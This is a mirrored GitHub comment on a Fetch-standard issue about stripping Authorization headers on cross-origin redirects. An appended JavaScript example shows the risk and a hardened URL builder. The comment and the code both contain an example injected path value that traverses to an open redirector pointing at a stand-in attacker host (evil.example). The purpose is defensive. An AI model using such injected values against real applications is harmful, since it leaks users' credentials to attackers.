Re: [whatwg/fetch] Drop developer-controlled Authorization header on cross-origin redirects (#944)

I think the threat model is a little different here: it's the application interpolating data into URLs of requests to which the `Authorization` header is attached.

For example, let's say my application takes the `user` parameter from the query or fragment, and then makes a request to `/api/{user}/num_frombles`. An attacker will be able to set the `user` to `../../redirect?url=https://evil.example#` and make the victim's browser leak their credentials to the attacker's origin (assuming there's a redirector somewhere in the application, which is common).

These kinds of injections happen fairly frequently because usually by themselves they aren't vulnerabilities, at least as long as the application sanitizes/validates the data it receives from the server. But in a world where `Authorization` or other headers contain secrets authenticating the user, this can become a major source of problems. It would be nice to fix this, especially if applications haven't started relying on redirected preflights yet.

@mikewest 

-- 
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub:
https://github.com/whatwg/fetch/issues/944#issuecomment-578437196

Received on Saturday, 25 January 2020 19:47:53 UTC
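As an added illustration of the URL-interpolation problem described in the comment above (example code written for this page, not from the whatwg/fetch thread or the Fetch standard): the first function builds the URL the way the comment describes and shows how the browser's URL parser resolves the `../..` segments into a request to the redirector; the second function rejects the same input by allowlisting the path segment, percent-encoding it, and checking that the resulting URL is still same-origin and under the API prefix before a bearer token would be attached. The origin `https://app.example`, the `/redirect?url=` endpoint, the `SEGMENT_RE` pattern and the sample `user` values are all constructed for the example.

```javascript
// Added example (not from the whatwg/fetch thread): how untrusted input
// interpolated into a URL path reaches an open redirector, and how to build
// the URL so that it cannot. Origin, paths and the `user` values below are
// constructed for illustration.

const APP_ORIGIN = 'https://app.example'; // assumed application origin
const ATTACKER_INPUT = '../../redirect?url=https://evil.example#';

// Naive construction: the comment's `/api/{user}/num_frombles` with the raw value.
// The URL parser resolves the dot-segments, so the request goes to the
// redirector and `/num_frombles` ends up in the fragment.
function buildNaive(user) {
  return new URL(`/api/${user}/num_frombles`, APP_ORIGIN);
}

// Hardened construction: the path segment must match a strict allowlist
// (assumed identifier format), is percent-encoded, and the parsed URL is
// checked against the intended origin and path prefix.
const SEGMENT_RE = /^[A-Za-z0-9_-]{1,64}$/;

function buildChecked(user) {
  if (!SEGMENT_RE.test(user)) {
    throw new Error('invalid user identifier');
  }
  const url = new URL(`/api/${encodeURIComponent(user)}/num_frombles`, APP_ORIGIN);
  if (!mayAttachAuthorization(url)) {
    throw new Error('request would leave the API prefix');
  }
  return url;
}

// True only when a URL is one the application intends to authenticate:
// same origin as the API and under the API prefix after parsing, so no
// traversal into a redirector (or any other endpoint) survived.
function mayAttachAuthorization(url) {
  return url.origin === APP_ORIGIN && url.pathname.startsWith('/api/');
}

function demo() {
  const naive = buildNaive(ATTACKER_INPUT);
  console.log('naive URL          :', naive.href);
  console.log('safe to authenticate:', mayAttachAuthorization(naive));
  try {
    buildChecked(ATTACKER_INPUT);
  } catch (e) {
    console.log('checked builder    : rejected ->', e.message);
  }
  console.log('valid user         :', buildChecked('alice').href);
  return { naive: naive.href, naiveAllowed: mayAttachAuthorization(naive) };
}

demo();
```

The client-side check only catches traversal that is visible in the URL the application builds; it does nothing about a server that answers a legitimate `/api/...` request with a cross-origin redirect, which is the case the issue asks the Fetch standard to handle by dropping the developer-set `Authorization` header.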